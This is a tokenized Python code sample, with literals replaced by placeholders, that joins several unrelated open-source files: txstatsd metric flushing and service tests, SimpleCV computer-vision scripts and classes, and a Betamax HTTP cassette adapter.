start = self . 
time_function ( ) <EOL> events = <NUM_LIT:0> <EOL> for metrics in self . flush_gauge_metrics ( timestamp ) : <EOL> for metric in metrics : <EOL> yield metric <EOL> events += <NUM_LIT:1> <EOL> duration = self . time_function ( ) - start <EOL> num_stats += events <EOL> per_metric [ "<STR_LIT>" ] = ( events , duration ) <EOL> start = self . time_function ( ) <EOL> events = <NUM_LIT:0> <EOL> for metrics in self . flush_meter_metrics ( timestamp ) : <EOL> for metric in metrics : <EOL> yield metric <EOL> events += <NUM_LIT:1> <EOL> duration = self . time_function ( ) - start <EOL> num_stats += events <EOL> per_metric [ "<STR_LIT>" ] = ( events , duration ) <EOL> start = self . time_function ( ) <EOL> events = <NUM_LIT:0> <EOL> for metrics in self . flush_plugin_metrics ( interval , timestamp ) : <EOL> for metric in metrics : <EOL> yield metric <EOL> events += <NUM_LIT:1> <EOL> duration = self . time_function ( ) - start <EOL> num_stats += events <EOL> per_metric [ "<STR_LIT>" ] = ( events , duration ) <EOL> for metrics in self . flush_metrics_summary ( num_stats , per_metric , <EOL> timestamp ) : <EOL> for metric in metrics : <EOL> yield metric <EOL> def flush_counter_metrics ( self , interval , timestamp ) : <EOL> for key , count in self . counter_metrics . iteritems ( ) : <EOL> self . counter_metrics [ key ] = <NUM_LIT:0> <EOL> value = count / interval <EOL> yield ( ( self . stats_prefix + key , value , timestamp ) , <EOL> ( self . count_prefix + key , count , timestamp ) ) <EOL> def flush_timer_metrics ( self , percent , timestamp ) : <EOL> threshold_value = ( ( <NUM_LIT:100> - percent ) / <NUM_LIT> ) <EOL> for key , timers in self . timer_metrics . iteritems ( ) : <EOL> count = len ( timers ) <EOL> if count > <NUM_LIT:0> : <EOL> self . timer_metrics [ key ] = [ ] <EOL> timers . 
sort ( ) <EOL> lower = timers [ <NUM_LIT:0> ] <EOL> upper = timers [ - <NUM_LIT:1> ] <EOL> count = len ( timers ) <EOL> mean = lower <EOL> threshold_upper = upper <EOL> if count > <NUM_LIT:1> : <EOL> index = count - int ( round ( threshold_value * count ) ) <EOL> timers = timers [ : index ] <EOL> threshold_upper = timers [ - <NUM_LIT:1> ] <EOL> mean = sum ( timers ) / index <EOL> items = { "<STR_LIT>" : mean , <EOL> "<STR_LIT>" : upper , <EOL> "<STR_LIT>" % percent : threshold_upper , <EOL> "<STR_LIT>" : lower , <EOL> "<STR_LIT>" : count } <EOL> yield sorted ( ( self . timer_prefix + key + item , value , timestamp ) <EOL> for item , value in items . iteritems ( ) ) <EOL> def flush_gauge_metrics ( self , timestamp ) : <EOL> for metric in self . gauge_metrics : <EOL> value = metric [ <NUM_LIT:0> ] <EOL> key = metric [ <NUM_LIT:1> ] <EOL> yield ( ( self . gauge_prefix + key + "<STR_LIT>" , value , timestamp ) , ) <EOL> def flush_meter_metrics ( self , timestamp ) : <EOL> for metric in self . meter_metrics . itervalues ( ) : <EOL> messages = metric . report ( timestamp ) <EOL> yield messages <EOL> def flush_plugin_metrics ( self , interval , timestamp ) : <EOL> for metric in self . plugin_metrics . itervalues ( ) : <EOL> messages = metric . flush ( interval , timestamp ) <EOL> yield messages <EOL> def flush_metrics_summary ( self , num_stats , per_metric , timestamp ) : <EOL> yield ( ( self . internal_metrics_prefix + "<STR_LIT>" , <EOL> num_stats , timestamp ) , ) <EOL> self . last_flush_duration = <NUM_LIT:0> <EOL> for name , ( value , duration ) in per_metric . iteritems ( ) : <EOL> yield ( ( self . internal_metrics_prefix + <EOL> "<STR_LIT>" % name , <EOL> value , timestamp ) , <EOL> ( self . internal_metrics_prefix + <EOL> "<STR_LIT>" % name , <EOL> duration * <NUM_LIT:1000> , timestamp ) ) <EOL> log . msg ( "<STR_LIT>" % <EOL> ( value , name , duration ) ) <EOL> self . last_flush_duration += duration <EOL> self . 
last_process_duration = <NUM_LIT:0> <EOL> for metric_type , duration in self . process_timings . iteritems ( ) : <EOL> yield ( ( self . internal_metrics_prefix + <EOL> "<STR_LIT>" % <EOL> metric_type , self . by_type [ metric_type ] , timestamp ) , <EOL> ( self . internal_metrics_prefix + <EOL> "<STR_LIT>" % <EOL> metric_type , duration * <NUM_LIT:1000> , timestamp ) ) <EOL> log . msg ( "<STR_LIT>" % <EOL> ( self . by_type [ metric_type ] , metric_type , duration ) ) <EOL> self . last_process_duration += duration <EOL> self . process_timings . clear ( ) <EOL> self . by_type . clear ( ) </s>
<s> import tempfile <EOL> try : <EOL> import ConfigParser <EOL> from StringIO import StringIO <EOL> except ImportError : <EOL> import configparser as ConfigParser <EOL> from io import StringIO <EOL> from twisted . trial . unittest import TestCase <EOL> from carbon . client import CarbonClientManager <EOL> from twisted . internet . defer import inlineCallbacks , Deferred <EOL> from twisted . internet . protocol import DatagramProtocol <EOL> from twisted . application . internet import UDPServer <EOL> from txstatsd import service <EOL> from txstatsd . server . processor import MessageProcessor <EOL> from txstatsd . server . protocol import StatsDServerProtocol <EOL> from txstatsd . report import ReportingService <EOL> class GlueOptionsTestCase ( TestCase ) : <EOL> def test_defaults ( self ) : <EOL> """<STR_LIT>""" <EOL> class TestOptions ( service . OptionsGlue ) : <EOL> optParameters = [ [ "<STR_LIT:test>" , "<STR_LIT:t>" , "<STR_LIT:default>" , "<STR_LIT>" ] ] <EOL> o = TestOptions ( ) <EOL> o . parseOptions ( [ ] ) <EOL> self . assertEquals ( "<STR_LIT:default>" , o [ "<STR_LIT:test>" ] ) <EOL> def test_set_parameter ( self ) : <EOL> """<STR_LIT>""" <EOL> class TestOptions ( service . OptionsGlue ) : <EOL> optParameters = [ [ "<STR_LIT:test>" , "<STR_LIT:t>" , "<STR_LIT:default>" , "<STR_LIT>" ] ] <EOL> o = TestOptions ( ) <EOL> o . parseOptions ( [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertEquals ( "<STR_LIT>" , o [ "<STR_LIT:test>" ] ) <EOL> def test_no_config_option ( self ) : <EOL> """<STR_LIT>""" <EOL> class TestOptions ( service . OptionsGlue ) : <EOL> optParameters = [ [ "<STR_LIT>" , "<STR_LIT:c>" , "<STR_LIT:default>" , "<STR_LIT>" ] ] <EOL> self . 
assertRaises ( ValueError , lambda : TestOptions ( ) ) <EOL> def get_file_parser ( self , glue_parameters_config = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if glue_parameters_config is None : <EOL> glue_parameters_config = [ [ "<STR_LIT:test>" , "<STR_LIT:t>" , "<STR_LIT:default>" , "<STR_LIT>" ] ] <EOL> f = tempfile . NamedTemporaryFile ( ) <EOL> config = ConfigParser . RawConfigParser ( ) <EOL> config . add_section ( '<STR_LIT>' ) <EOL> if not kwargs : <EOL> config . set ( '<STR_LIT>' , '<STR_LIT:test>' , '<STR_LIT>' ) <EOL> else : <EOL> for k , v in kwargs . items ( ) : <EOL> config . set ( '<STR_LIT>' , k , v ) <EOL> config . write ( f ) <EOL> f . flush ( ) <EOL> class TestOptions ( service . OptionsGlue ) : <EOL> optParameters = glue_parameters_config <EOL> def __init__ ( self ) : <EOL> self . config_section = '<STR_LIT>' <EOL> super ( TestOptions , self ) . __init__ ( ) <EOL> return f , TestOptions ( ) <EOL> def test_reads_from_config ( self ) : <EOL> """<STR_LIT>""" <EOL> f , o = self . get_file_parser ( ) <EOL> o . parseOptions ( [ "<STR_LIT>" , f . name ] ) <EOL> self . assertEquals ( "<STR_LIT>" , o [ "<STR_LIT:test>" ] ) <EOL> def test_cmdline_overrides_config ( self ) : <EOL> """<STR_LIT>""" <EOL> f , o = self . get_file_parser ( ) <EOL> o . parseOptions ( [ "<STR_LIT>" , f . name , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertEquals ( "<STR_LIT>" , o [ "<STR_LIT:test>" ] ) <EOL> def test_ensure_config_values_coerced ( self ) : <EOL> """<STR_LIT>""" <EOL> f , o = self . get_file_parser ( [ [ "<STR_LIT>" , "<STR_LIT:n>" , <NUM_LIT:5> , "<STR_LIT>" , int ] ] , <EOL> number = <NUM_LIT:10> ) <EOL> o . parseOptions ( [ "<STR_LIT>" , f . name ] ) <EOL> self . assertEquals ( <NUM_LIT:10> , o [ "<STR_LIT>" ] ) <EOL> def test_support_default_not_in_config ( self ) : <EOL> """<STR_LIT>""" <EOL> f , o = self . get_file_parser ( [ [ "<STR_LIT>" , "<STR_LIT:n>" , <NUM_LIT:5> , "<STR_LIT>" , int ] ] ) <EOL> o . parseOptions ( [ "<STR_LIT>" , f . 
name ] ) <EOL> self . assertEquals ( <NUM_LIT:5> , o [ "<STR_LIT>" ] ) <EOL> def test_support_plugin_sections ( self ) : <EOL> class TestOptions ( service . OptionsGlue ) : <EOL> optParameters = [ [ "<STR_LIT:test>" , "<STR_LIT:t>" , "<STR_LIT:default>" , "<STR_LIT>" ] ] <EOL> config_section = "<STR_LIT>" <EOL> o = TestOptions ( ) <EOL> config_file = ConfigParser . RawConfigParser ( ) <EOL> config_file . readfp ( StringIO ( "<STR_LIT>" ) ) <EOL> o . configure ( config_file ) <EOL> self . assertEquals ( o [ "<STR_LIT>" ] , config_file . items ( "<STR_LIT>" ) ) <EOL> class StatsDOptionsTestCase ( TestCase ) : <EOL> def test_support_multiple_carbon_cache_options ( self ) : <EOL> """<STR_LIT>""" <EOL> o = service . StatsDOptions ( ) <EOL> config_file = ConfigParser . RawConfigParser ( ) <EOL> config_file . readfp ( StringIO ( "<STR_LIT:\n>" . join ( [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] ) ) ) <EOL> o . configure ( config_file ) <EOL> self . assertEquals ( o [ "<STR_LIT>" ] , <EOL> [ "<STR_LIT:127.0.0.1>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertEquals ( o [ "<STR_LIT>" ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> self . assertEquals ( o [ "<STR_LIT>" ] , <EOL> [ "<STR_LIT:a>" , "<STR_LIT:b>" , "<STR_LIT:c>" ] ) <EOL> class ClientManagerStatsTestCase ( TestCase ) : <EOL> def test_report_client_manager_stats ( self ) : <EOL> """<STR_LIT>""" <EOL> from carbon . instrumentation import stats <EOL> stats [ "<STR_LIT:foo>" ] = <NUM_LIT:0> <EOL> stats [ "<STR_LIT:bar>" ] = <NUM_LIT:1> <EOL> stats [ "<STR_LIT>" ] = <NUM_LIT:2> <EOL> stats [ "<STR_LIT>" ] = <NUM_LIT:3> <EOL> self . assertEquals ( { "<STR_LIT>" : <NUM_LIT:2> , <EOL> "<STR_LIT>" : <NUM_LIT:3> } , <EOL> service . report_client_manager_stats ( ) ) <EOL> self . 
assertEquals ( { "<STR_LIT:foo>" : <NUM_LIT:0> , <EOL> "<STR_LIT:bar>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : <NUM_LIT:0> , <EOL> "<STR_LIT>" : <NUM_LIT:0> } , stats ) <EOL> class Agent ( DatagramProtocol ) : <EOL> def __init__ ( self ) : <EOL> self . monitor_response = None <EOL> def datagramReceived ( self , data , host_port ) : <EOL> host , port = host_port <EOL> self . monitor_response = data <EOL> class ServiceTestsBuilder ( TestCase ) : <EOL> def test_service ( self ) : <EOL> """<STR_LIT>""" <EOL> o = service . StatsDOptions ( ) <EOL> s = service . createService ( o ) <EOL> self . assertTrue ( isinstance ( s , service . MultiService ) ) <EOL> reporting , manager , statsd , udp , httpinfo = s . services <EOL> self . assertTrue ( isinstance ( reporting , ReportingService ) ) <EOL> self . assertTrue ( isinstance ( manager , CarbonClientManager ) ) <EOL> self . assertTrue ( isinstance ( statsd , service . StatsDService ) ) <EOL> self . assertTrue ( isinstance ( udp , UDPServer ) ) <EOL> def test_default_clients ( self ) : <EOL> """<STR_LIT>""" <EOL> o = service . StatsDOptions ( ) <EOL> s = service . createService ( o ) <EOL> manager = s . services [ <NUM_LIT:1> ] <EOL> self . assertEqual ( sorted ( manager . client_factories . keys ( ) ) , <EOL> [ ( "<STR_LIT:127.0.0.1>" , <NUM_LIT> , None ) ] ) <EOL> def test_multiple_clients ( self ) : <EOL> """<STR_LIT>""" <EOL> o = service . StatsDOptions ( ) <EOL> o [ "<STR_LIT>" ] = [ "<STR_LIT:127.0.0.1>" , "<STR_LIT>" ] <EOL> o [ "<STR_LIT>" ] = [ <NUM_LIT> , <NUM_LIT> ] <EOL> o [ "<STR_LIT>" ] = [ "<STR_LIT:a>" , "<STR_LIT:b>" ] <EOL> s = service . createService ( o ) <EOL> manager = s . services [ <NUM_LIT:1> ] <EOL> self . assertEqual ( sorted ( manager . client_factories . keys ( ) ) , <EOL> [ ( "<STR_LIT:127.0.0.1>" , <NUM_LIT> , "<STR_LIT:a>" ) , <EOL> ( "<STR_LIT>" , <NUM_LIT> , "<STR_LIT:b>" ) ] ) <EOL> def test_carbon_client_options ( self ) : <EOL> """<STR_LIT>""" <EOL> from carbon . 
conf import settings <EOL> o = service . StatsDOptions ( ) <EOL> o [ "<STR_LIT>" ] = <NUM_LIT> <EOL> o [ "<STR_LIT>" ] = <NUM_LIT> <EOL> service . createService ( o ) <EOL> self . assertEqual ( settings . MAX_QUEUE_SIZE , <NUM_LIT> ) <EOL> self . assertEqual ( settings . MAX_DATAPOINTS_PER_MESSAGE , <NUM_LIT> ) <EOL> def test_monitor_response ( self ) : <EOL> """<STR_LIT>""" <EOL> from twisted . internet import reactor <EOL> options = service . StatsDOptions ( ) <EOL> processor = MessageProcessor ( ) <EOL> statsd_server_protocol = StatsDServerProtocol ( <EOL> processor , <EOL> monitor_message = options [ "<STR_LIT>" ] , <EOL> monitor_response = options [ "<STR_LIT>" ] ) <EOL> reactor . listenUDP ( options [ "<STR_LIT>" ] , statsd_server_protocol ) <EOL> agent = Agent ( ) <EOL> reactor . listenUDP ( <NUM_LIT:0> , agent ) <EOL> @ inlineCallbacks <EOL> def exercise ( ) : <EOL> def monitor_send ( ) : <EOL> agent . transport . write ( <EOL> options [ "<STR_LIT>" ] , <EOL> ( "<STR_LIT:127.0.0.1>" , options [ "<STR_LIT>" ] ) ) <EOL> def statsd_response ( result ) : <EOL> self . assertEqual ( options [ "<STR_LIT>" ] , <EOL> agent . monitor_response ) <EOL> yield monitor_send ( ) <EOL> d = Deferred ( ) <EOL> d . addCallback ( statsd_response ) <EOL> reactor . callLater ( <NUM_LIT> , d . callback , None ) <EOL> try : <EOL> yield d <EOL> except : <EOL> raise <EOL> finally : <EOL> reactor . stop ( ) <EOL> reactor . callWhenRunning ( exercise ) <EOL> reactor . run ( ) </s>
<s> from SimpleCV import * <EOL> from CardUtil import * <EOL> from PlayingCardFactory import * <EOL> import numpy as np <EOL> def GetParallelSets ( line_fs , parallel_thresh = <NUM_LIT> ) : <EOL> result = [ ] <EOL> sz = len ( line_fs ) <EOL> for i in range ( <NUM_LIT:0> , sz ) : <EOL> for j in range ( <NUM_LIT:0> , sz ) : <EOL> if ( j <= i ) : <EOL> result . append ( np . Inf ) <EOL> else : <EOL> result . append ( np . abs ( line_fs [ i ] . cross ( line_fs [ j ] ) ) ) <EOL> result = np . array ( result ) <EOL> result = result . reshape ( sz , sz ) <EOL> l1 , l2 = np . where ( result < parallel_thresh ) <EOL> idxs = zip ( l1 , l2 ) <EOL> retVal = [ ] <EOL> for idx in idxs : <EOL> retVal . append ( ( line_fs [ idx [ <NUM_LIT:0> ] ] , line_fs [ idx [ <NUM_LIT:1> ] ] ) ) <EOL> return retVal <EOL> pcf = PlayingCardFactory ( ) <EOL> data , labels = GetFullDataSet ( ) <EOL> print len ( data ) <EOL> datapoints = zip ( data , labels ) <EOL> datapoints = datapoints [ <NUM_LIT:0> : <NUM_LIT:200> ] <EOL> result = [ ] <EOL> passing = <NUM_LIT:0> <EOL> for d in datapoints : <EOL> img = d [ <NUM_LIT:0> ] <EOL> label = d [ <NUM_LIT:1> ] <EOL> img = img . edges ( ) <EOL> l = img . findLines ( threshold = <NUM_LIT:10> ) <EOL> if ( l is not None ) : <EOL> v = <NUM_LIT> <EOL> h = <NUM_LIT:30> <EOL> vl = l . filter ( np . abs ( l . angle ( ) ) > v ) <EOL> vl = vl . filter ( vl . length ( ) > img . height / <NUM_LIT:6> ) <EOL> hl = l . filter ( np . abs ( l . angle ( ) ) < h ) <EOL> hl = hl . filter ( hl . length ( ) > img . width / <NUM_LIT:8> ) <EOL> vl . draw ( color = Color . RED , width = <NUM_LIT:3> ) <EOL> hl . draw ( color = Color . BLUE , width = <NUM_LIT:3> ) <EOL> img . show ( ) <EOL> time . sleep ( <NUM_LIT> ) </s>
<s> from SimpleCV . base import * <EOL> from SimpleCV . Features import Feature , FeatureSet , BlobMaker <EOL> from SimpleCV . ImageClass import Image <EOL> from SimpleCV . Segmentation . SegmentationBase import SegmentationBase <EOL> class DiffSegmentation ( SegmentationBase ) : <EOL> """<STR_LIT>""" <EOL> mError = False <EOL> mLastImg = None <EOL> mCurrImg = None <EOL> mDiffImg = None <EOL> mColorImg = None <EOL> mGrayOnlyMode = True <EOL> mThreshold = <NUM_LIT:10> <EOL> mBlobMaker = None <EOL> def __init__ ( self , grayOnly = False , threshold = ( <NUM_LIT:10> , <NUM_LIT:10> , <NUM_LIT:10> ) ) : <EOL> self . mGrayOnlyMode = grayOnly <EOL> self . mThreshold = threshold <EOL> self . mError = False <EOL> self . mCurrImg = None <EOL> self . mLastImg = None <EOL> self . mDiffImg = None <EOL> self . mColorImg = None <EOL> self . mBlobMaker = BlobMaker ( ) <EOL> def addImage ( self , img ) : <EOL> """<STR_LIT>""" <EOL> if ( img is None ) : <EOL> return <EOL> if ( self . mLastImg == None ) : <EOL> if ( self . mGrayOnlyMode ) : <EOL> self . mLastImg = img . toGray ( ) <EOL> self . mDiffImg = Image ( self . mLastImg . getEmpty ( <NUM_LIT:1> ) ) <EOL> self . mCurrImg = None <EOL> else : <EOL> self . mLastImg = img <EOL> self . mDiffImg = Image ( self . mLastImg . getEmpty ( <NUM_LIT:3> ) ) <EOL> self . mCurrImg = None <EOL> else : <EOL> if ( self . mCurrImg is not None ) : <EOL> self . mLastImg = self . mCurrImg <EOL> if ( self . mGrayOnlyMode ) : <EOL> self . mColorImg = img <EOL> self . mCurrImg = img . toGray ( ) <EOL> else : <EOL> self . mColorImg = img <EOL> self . mCurrImg = img <EOL> cv . AbsDiff ( self . mCurrImg . getBitmap ( ) , self . mLastImg . getBitmap ( ) , self . mDiffImg . getBitmap ( ) ) <EOL> return <EOL> def isReady ( self ) : <EOL> """<STR_LIT>""" <EOL> if ( self . mDiffImg is None ) : <EOL> return False <EOL> else : <EOL> return True <EOL> def isError ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . 
mError <EOL> def resetError ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mError = False <EOL> return <EOL> def reset ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mCurrImg = None <EOL> self . mLastImg = None <EOL> self . mDiffImg = None <EOL> def getRawImage ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . mDiffImg <EOL> def getSegmentedImage ( self , whiteFG = True ) : <EOL> """<STR_LIT>""" <EOL> retVal = None <EOL> if ( whiteFG ) : <EOL> retVal = self . mDiffImg . binarize ( thresh = self . mThreshold ) <EOL> else : <EOL> retVal = self . mDiffImg . binarize ( thresh = self . mThreshold ) . invert ( ) <EOL> return retVal <EOL> def getSegmentedBlobs ( self ) : <EOL> """<STR_LIT>""" <EOL> retVal = [ ] <EOL> if ( self . mColorImg is not None and self . mDiffImg is not None ) : <EOL> retVal = self . mBlobMaker . extractFromBinary ( self . mDiffImg . binarize ( thresh = self . mThreshold ) , self . mColorImg ) <EOL> return retVal <EOL> def __getstate__ ( self ) : <EOL> mydict = self . __dict__ . copy ( ) <EOL> self . mBlobMaker = None <EOL> del mydict [ '<STR_LIT>' ] <EOL> return mydict <EOL> def __setstate__ ( self , mydict ) : <EOL> self . __dict__ = mydict <EOL> self . mBlobMaker = BlobMaker ( ) </s>
<s> from SimpleCV import * <EOL> import time <EOL> """<STR_LIT>""" <EOL> def identifyGender ( ) : <EOL> f = FaceRecognizer ( ) <EOL> cam = Camera ( ) <EOL> img = cam . getImage ( ) <EOL> cascade = LAUNCH_PATH + "<STR_LIT:/>" + "<STR_LIT>" <EOL> feat = img . findHaarFeatures ( cascade ) <EOL> if feat : <EOL> crop_image = feat . sortArea ( ) [ - <NUM_LIT:1> ] . crop ( ) <EOL> feat . sortArea ( ) [ - <NUM_LIT:1> ] . draw ( ) <EOL> f . load ( LAUNCH_PATH + "<STR_LIT:/>" + "<STR_LIT>" ) <EOL> w , h = f . imageSize <EOL> crop_image = crop_image . resize ( w , h ) <EOL> label , confidence = f . predict ( crop_image ) <EOL> print label <EOL> if label == <NUM_LIT:0> : <EOL> img . drawText ( "<STR_LIT>" , fontsize = <NUM_LIT> ) <EOL> else : <EOL> img . drawText ( "<STR_LIT>" , fontsize = <NUM_LIT> ) <EOL> img . show ( ) <EOL> time . sleep ( <NUM_LIT:4> ) <EOL> identifyGender ( ) </s>
<s> """<STR_LIT>""" <EOL> print __doc__ <EOL> from SimpleCV import * <EOL> import pygame <EOL> import time <EOL> img = Image ( ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> layer = DrawingLayer ( ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> layer . setFontSize ( <NUM_LIT> ) <EOL> layer . rectangle ( ( <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT> , <NUM_LIT> ) , Color . WHITE , <NUM_LIT:1> , True ) <EOL> layer . text ( "<STR_LIT>" , ( <NUM_LIT:50> , <NUM_LIT> ) , Color . BLACK ) <EOL> layer . text ( "<STR_LIT>" , ( <NUM_LIT:50> , <NUM_LIT:50> ) , Color . BLACK ) <EOL> layer . text ( "<STR_LIT>" , ( <NUM_LIT:50> , <NUM_LIT> ) , Color . BLACK ) <EOL> layer . circle ( ( <NUM_LIT> , <NUM_LIT:200> ) , <NUM_LIT> , Color . RED , <NUM_LIT:1> , True ) <EOL> layer . circle ( ( <NUM_LIT> , <NUM_LIT:200> ) , <NUM_LIT> , Color . BLUE , <NUM_LIT:1> , True ) <EOL> layer . circle ( ( <NUM_LIT> , <NUM_LIT:200> ) , <NUM_LIT> , Color . GREEN , <NUM_LIT:1> , True ) <EOL> layer . circle ( ( <NUM_LIT> , <NUM_LIT> ) , <NUM_LIT> , Color . YELLOW , <NUM_LIT:1> , True ) <EOL> layer . circle ( ( <NUM_LIT> , <NUM_LIT> ) , <NUM_LIT> , Color . ORANGE , <NUM_LIT:1> , True ) <EOL> layer . circle ( ( <NUM_LIT> , <NUM_LIT> ) , <NUM_LIT> , Color . CYAN , <NUM_LIT:1> , True ) <EOL> img . addDrawingLayer ( layer ) <EOL> img = img . applyLayers ( ) <EOL> display = Display ( ) <EOL> img . save ( display ) <EOL> power = <NUM_LIT:1> <EOL> angle = <NUM_LIT:0> <EOL> while not display . isDone ( ) : <EOL> time . sleep ( <NUM_LIT> ) <EOL> if ( pygame . key . get_pressed ( ) [ pygame . K_UP ] != <NUM_LIT:0> ) : <EOL> power += <NUM_LIT:10> <EOL> blur = img . motionBlur ( power , angle ) <EOL> blur . save ( display ) <EOL> if ( pygame . key . get_pressed ( ) [ pygame . K_DOWN ] != <NUM_LIT:0> ) : <EOL> power = max ( power - <NUM_LIT:10> , <NUM_LIT:1> ) <EOL> blur = img . motionBlur ( power , angle ) <EOL> blur . save ( display ) <EOL> if ( pygame . key . get_pressed ( ) [ pygame . 
K_LEFT ] != <NUM_LIT:0> ) : <EOL> angle -= <NUM_LIT:5> <EOL> blur = img . motionBlur ( power , angle ) <EOL> blur . save ( display ) <EOL> if ( pygame . key . get_pressed ( ) [ pygame . K_RIGHT ] != <NUM_LIT:0> ) : <EOL> angle += <NUM_LIT:5> <EOL> blur = img . motionBlur ( power , angle ) <EOL> blur . save ( display ) <EOL> pass </s>
<s> import os , sys <EOL> from SimpleCV import * <EOL> from nose . tools import with_setup <EOL> testoutput = "<STR_LIT>" <EOL> def test_virtual_camera_constructor ( ) : <EOL> mycam = VirtualCamera ( testoutput , '<STR_LIT:image>' ) <EOL> props = mycam . getAllProperties ( ) <EOL> for i in props . keys ( ) : <EOL> print str ( i ) + "<STR_LIT>" + str ( props [ i ] ) + "<STR_LIT:\n>" <EOL> pass <EOL> def test_camera_image ( ) : <EOL> mycam = Camera ( <NUM_LIT:0> ) <EOL> img = mycam . getImage ( ) <EOL> img . save ( testoutput ) <EOL> pass <EOL> def test_camera_multiple_instances ( ) : <EOL> cam1 = Camera ( ) <EOL> img1 = cam1 . getImage ( ) <EOL> cam2 = Camera ( ) <EOL> img2 = cam2 . getImage ( ) <EOL> if not cam1 or not cam2 or not img1 or not img2 : <EOL> assert False <EOL> cam3 = Camera ( <NUM_LIT:0> ) <EOL> img3 = cam3 . getImage ( ) <EOL> if not cam3 or not img3 : <EOL> assert False <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> from . import cassette <EOL> from . exceptions import BetamaxError <EOL> from datetime import datetime , timedelta <EOL> from requests . adapters import BaseAdapter , HTTPAdapter <EOL> _SENTINEL = object ( ) <EOL> class BetamaxAdapter ( BaseAdapter ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwargs ) : <EOL> super ( BetamaxAdapter , self ) . __init__ ( ) <EOL> self . cassette = None <EOL> self . cassette_name = None <EOL> self . old_adapters = kwargs . pop ( '<STR_LIT>' , { } ) <EOL> self . http_adapter = HTTPAdapter ( ** kwargs ) <EOL> self . serialize = None <EOL> self . options = { } <EOL> def cassette_exists ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . cassette_name and os . path . exists ( self . cassette_name ) : <EOL> return True <EOL> return False <EOL> def close ( self ) : <EOL> """<STR_LIT>""" <EOL> self . http_adapter . close ( ) <EOL> def eject_cassette ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . cassette : <EOL> self . cassette . eject ( ) <EOL> self . cassette = None <EOL> def load_cassette ( self , cassette_name , serialize , options ) : <EOL> """<STR_LIT>""" <EOL> self . cassette_name = cassette_name <EOL> self . serialize = serialize <EOL> self . options . update ( options . items ( ) ) <EOL> placeholders = self . options . get ( '<STR_LIT>' , { } ) <EOL> cassette_options = { } <EOL> default_options = cassette . Cassette . default_cassette_options <EOL> match_requests_on = self . options . get ( <EOL> '<STR_LIT>' , default_options [ '<STR_LIT>' ] <EOL> ) <EOL> cassette_options [ '<STR_LIT>' ] = self . options . get ( <EOL> '<STR_LIT>' , <EOL> ) <EOL> cassette_options [ '<STR_LIT>' ] = self . options . get ( <EOL> '<STR_LIT>' <EOL> ) <EOL> cassette_options [ '<STR_LIT>' ] = self . options . get ( '<STR_LIT>' ) <EOL> for option , value in list ( cassette_options . items ( ) ) : <EOL> if value is None : <EOL> cassette_options . pop ( option ) <EOL> self . cassette = cassette . 
Cassette ( <EOL> cassette_name , serialize , placeholders = placeholders , <EOL> cassette_library_dir = self . options . get ( '<STR_LIT>' ) , <EOL> ** cassette_options <EOL> ) <EOL> if '<STR_LIT>' in self . options : <EOL> self . cassette . record_mode = self . options [ '<STR_LIT>' ] <EOL> self . cassette . match_options = match_requests_on <EOL> re_record_interval = timedelta . max <EOL> if self . options . get ( '<STR_LIT>' ) : <EOL> re_record_interval = timedelta ( self . options [ '<STR_LIT>' ] ) <EOL> now = datetime . utcnow ( ) <EOL> if re_record_interval < ( now - self . cassette . earliest_recorded_date ) : <EOL> self . cassette . clear ( ) <EOL> def send ( self , request , stream = False , timeout = None , verify = True , <EOL> cert = None , proxies = None ) : <EOL> """<STR_LIT>""" <EOL> interaction = None <EOL> current_cassette = self . cassette <EOL> if not current_cassette : <EOL> raise BetamaxError ( '<STR_LIT>' ) <EOL> if current_cassette . interactions : <EOL> interaction = current_cassette . find_match ( request ) <EOL> if not interaction and current_cassette . is_recording ( ) : <EOL> interaction = self . send_and_record ( <EOL> request , stream , timeout , verify , cert , proxies <EOL> ) <EOL> if not interaction : <EOL> raise BetamaxError ( unhandled_request_message ( request , <EOL> current_cassette ) ) <EOL> resp = interaction . as_response ( ) <EOL> resp . connection = self <EOL> return resp <EOL> def send_and_record ( self , request , stream = False , timeout = None , <EOL> verify = True , cert = None , proxies = None ) : <EOL> """<STR_LIT>""" <EOL> adapter = self . find_adapter ( request . url ) <EOL> response = adapter . send ( <EOL> request , stream = True , timeout = timeout , verify = verify , <EOL> cert = cert , proxies = proxies <EOL> ) <EOL> return self . cassette . save_interaction ( response , request ) <EOL> def find_adapter ( self , url ) : <EOL> """<STR_LIT>""" <EOL> for ( prefix , adapter ) in self . old_adapters . 
items ( ) : <EOL> if url . lower ( ) . startswith ( prefix ) : <EOL> return adapter <EOL> UNHANDLED_REQUEST_EXCEPTION = """<STR_LIT>""" <EOL> def unhandled_request_message ( request , cassette ) : <EOL> """<STR_LIT>""" <EOL> return UNHANDLED_REQUEST_EXCEPTION . format ( <EOL> url = request . url , cassette_file_path = cassette . cassette_name , <EOL> cassette_record_mode = cassette . record_mode , <EOL> cassette_match_options = cassette . match_options <EOL> ) </s>
